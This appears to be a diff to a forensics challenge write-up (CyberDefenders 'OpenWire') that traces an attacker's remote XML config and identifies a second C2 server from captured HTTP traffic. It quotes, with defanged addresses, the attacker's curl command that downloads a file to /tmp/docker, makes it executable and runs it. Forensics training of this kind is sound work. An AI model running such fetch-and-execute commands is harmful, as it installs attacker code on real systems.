custyblak/Network_Forensics_Exercises/Cyberdefender/OpenWire Challenge/Approach.md

 <h2>Question 4 </h2>
 <b>The attacker's infrastructure often involves multiple components.
 What is the IP of the second C2 server? </b><br />
 <br> We followed a TCP stream in question 3 and noticed that a URL path hxxp[://]146[.]198[.]21[.]92:8888/invoice.xml pointing to an XML file named <b>invoice.xml</b> which seems to be path to an application configuration file.
 Using the "org.springframework.context.support.ClassPathXnlApplicationContext" which is a class from the Spring Framework used for loading application contexts fron XML files to load the invoice.xml file.
-Now, follow the HTTP stream of the frame that contains the URL, you will notice an enbedded script <b>"curl -s -o /tmp/docker hxxp[://]1120[.]199[.]52[.]72/docker; chmod +x /tmp/docker; /tmp/docker"</b> which downloads the file "docker" silently from hxxp[://]128[.]199[.]52[.]72/docker to the path /tmp/docker, makes it an executable and then executes the script.
+Now, follow the HTTP stream of the frame that contains the URL, you will notice an enbedded script <b>"curl -s -o /tmp/docker hxxp[://]128[.]199[.]52[.]72/docker; chmod +x /tmp/docker; /tmp/docker"</b> which downloads the file "docker" silently from hxxp[://]128[.]199[.]52[.]72/docker to the path /tmp/docker, makes it an executable and then executes the script.
+So, the server IP that contained the executable file is the C2 server.

 <p align="center">
 <img src="https://imgur.com/TiajAMr.png" height="100%" width="80%" alt="Enumeration_tool"/>